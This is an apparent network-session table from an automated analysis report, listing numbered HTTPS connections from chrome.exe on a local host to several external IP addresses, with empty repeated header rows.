                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          797192.168.2.55058623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          798192.168.2.55058790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          799192.168.2.55058890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          800192.168.2.55057954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          801192.168.2.55059090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          802192.168.2.55058043.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          803192.168.2.55058254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          804192.168.2.55059190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          805192.168.2.55059290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          806192.168.2.55059390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          807192.168.2.55055438.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          808192.168.2.55058943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          809192.168.2.55059490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          810192.168.2.55059590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          811192.168.2.55059690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          812192.168.2.55059790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          813192.168.2.55059890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          814192.168.2.55059990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          815192.168.2.55060090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          816192.168.2.55060190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          817192.168.2.55060290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          818192.168.2.55060390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          819192.168.2.55055338.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          820192.168.2.55060490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          821192.168.2.55061290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          822192.168.2.55061123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          823192.168.2.550607183.61.168.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          824192.168.2.550610183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          825192.168.2.55061323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          826192.168.2.550608183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          827192.168.2.550609183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          828192.168.2.55060554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          829192.168.2.55060643.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          830192.168.2.55061423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          831192.168.2.55061690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          832192.168.2.55061590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          833192.168.2.55061990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          834192.168.2.55062023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          835192.168.2.550617183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          836192.168.2.55062323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          837192.168.2.550618183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          838192.168.2.55062223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          839192.168.2.55062490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          840192.168.2.55062790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          841192.168.2.55062990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          842192.168.2.55062154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          843192.168.2.55063390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          844192.168.2.550626183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          845192.168.2.55062854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          846192.168.2.550634163.181.131.2254434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          847192.168.2.55063143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          848192.168.2.55063243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          849192.168.2.55063590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          850192.168.2.55063690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          851192.168.2.55063990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          852192.168.2.55063890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          853192.168.2.55064090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          854192.168.2.55063790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          855192.168.2.55064190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          856192.168.2.55064490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          857192.168.2.55064290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          858192.168.2.55064390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          859192.168.2.55064590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          860192.168.2.55064690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          861192.168.2.55064790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          862192.168.2.55039238.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          863192.168.2.55064823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          864192.168.2.55064990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          865192.168.2.55065223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          866192.168.2.55065323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          867192.168.2.55065523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          868192.168.2.55065490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          869192.168.2.55065690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          870192.168.2.55065723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          871192.168.2.55065054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          872192.168.2.55065923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          873192.168.2.55066023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          874192.168.2.55065823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          875192.168.2.55065143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          876192.168.2.55066523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          877192.168.2.55066690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          878192.168.2.55066490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          879192.168.2.55066790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          880192.168.2.550661183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          881192.168.2.550663183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          882192.168.2.550662183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          883192.168.2.55066890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          884192.168.2.55063038.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          885192.168.2.55067423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          886192.168.2.55067690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          887192.168.2.55067290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          888192.168.2.55067523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          889192.168.2.55067390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          890192.168.2.55067790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          891192.168.2.55067190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          892192.168.2.55067923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          893192.168.2.55067890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          894192.168.2.55068090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          895192.168.2.55068390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          896192.168.2.55068590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          897192.168.2.55066954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          898192.168.2.55067043.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          899192.168.2.55068890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          900192.168.2.55068154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          901192.168.2.55068243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          902192.168.2.550687183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          903192.168.2.550686183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          904192.168.2.55068990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          905192.168.2.55069090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          906192.168.2.55069190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          907192.168.2.550692163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          908192.168.2.55069390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          909192.168.2.55069623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          910192.168.2.55069823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          911192.168.2.55070090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          912192.168.2.550695202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          913192.168.2.55069790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          914192.168.2.55070123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          915192.168.2.55070223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          916192.168.2.55070323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          917192.168.2.550699183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          918192.168.2.55070823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          919192.168.2.55070990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          920192.168.2.55071290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          921192.168.2.55070654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
